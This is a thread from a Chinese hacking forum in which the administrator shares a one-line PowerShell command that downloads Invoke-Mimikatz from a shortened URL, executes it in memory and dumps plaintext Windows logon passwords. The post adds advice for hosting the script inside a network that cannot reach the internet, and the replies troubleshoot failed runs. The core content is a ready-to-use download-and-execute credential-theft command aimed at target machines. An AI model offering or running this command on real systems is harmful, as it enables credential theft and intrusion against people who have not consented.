搜索
查看: 925|回复: 4

一句powershell调用mimikatz抓密码

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2015-7-30 21:42:42 | 显示全部楼层 |阅读模式

mimikatz神器大家都知道吧,可以抓取系统内的明文密码,但是平时我们测试的时候需要把mimikatz的几个文件上传到目标系统上面,然后再手工执行几个命令才能搞定,今天无意访问一个大神的博客,发现其实可以利用powershell一句话搞定,是国外大神的方法。

国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当轻便。

以管理员权限启动CMD执行下以命令即可:

  1. powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
复制代码

http://is.gd/oeoFuI实际上就是https://raw.githubusercontent.co ... Invoke-Mimikatz.ps1


实战中如果机器不能上外网可以将脚本下载回来放到内网的web service上。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
过段时间可能会取消签到功能了
success95 该用户已被删除
发表于 2016-2-1 11:50:20 | 显示全部楼层
好方法,谢分享
success95 该用户已被删除
发表于 2016-2-1 22:07:17 | 显示全部楼层
不过测试了下在我的win7 x64的cmd下运行出错,一大堆的错误

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2016-2-1 23:11:44 | 显示全部楼层
success95 发表于 2016-2-1 22:07
不过测试了下在我的win7 x64的cmd下运行出错,一大堆的错误

是已管理员权限运行的吗,而且国内有时访问不了命令中的url(github)
您可以更新记录, 让好友们知道您在做什么...
success95 该用户已被删除
发表于 2016-2-6 20:45:25 | 显示全部楼层
Jumbo 发表于 2016-2-1 23:11
是已管理员权限运行的吗,而且国内有时访问不了命令中的url(github)

绝对是管理员运行的。但就是出错了,执行没有mimikatz的页面
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表